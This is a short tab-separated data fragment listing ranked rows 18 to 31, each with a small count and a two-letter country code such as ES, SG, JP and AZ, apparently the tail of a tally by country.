18	2	ES
19	2	SG
20	2	AE
21	2	IN
22	2	PT
23	2	TR
24	2	SE
25	1	HU
26	1	IT
27	1	UA
28	1	JP
29	1	GR
30	1	ID
31	1	AZ